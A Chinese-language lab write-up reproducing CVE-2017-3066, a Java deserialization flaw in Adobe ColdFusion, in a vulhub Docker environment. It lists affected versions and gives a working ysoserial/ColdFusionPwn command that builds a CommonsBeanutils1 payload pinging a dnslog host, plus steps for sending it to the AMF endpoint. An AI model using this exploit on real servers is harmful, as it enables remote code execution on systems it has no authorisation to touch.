漏洞描述
Adobe ColdFusion
是一个动态Web
服务器,其所采用的CFML(ColdFusion Markup Language)
程序设计语言类似JSP
的JSTL(JSP Standard Tag Lib)
,CFML
是一种针对Web
应用的脚本语言,文件后缀为.cfm
。
Adobe ColdFusion
存在Java
反序列化漏洞,攻击者可通过该漏洞在应用程序上下文中执行任意代码或造成拒绝服务。
影响版本
Adobe ColdFusion(2016 release) Update 3
及之前版本。
Adobe ColdFusion 11 Update 11
及之前版本。
Aodbe ColdFusion 10 Update 22
及之前版本。
漏洞复现
git clone https://github.com/vulhub/vulhub.git
cd vulhub/coldfusion/CVE-2017-3066
docker-compose up -d
访问链接http://<ip>:8500/
,显示页面无法展示,还有一个大的404头像。
访问http://<IP>:8500/CFIDE/administrator/index.cfm
,默认密码为vulhub
,然后有一个初始化成功页面。
利用工具:
Releases · codewhitesec/ColdFusionPwn (github.com)
https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
生成poc.ser
:
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'ping oopsdc.zzn11a.dnslog.cn' poc.ser
然后抓取访问http://<ip>:8500/flex2gateway/amf
的数据包,请求方式更改为POST
,Content-Type
更改为application/x-amf
,在最后面选择从文件中复制
,然后将poc.ser
文件内容粘贴到请求中,点击转发包,查看dnslog
记录即可。
文章许可:本文采用CC BY-NC-SA 4.0许可协议,转载请注明出处。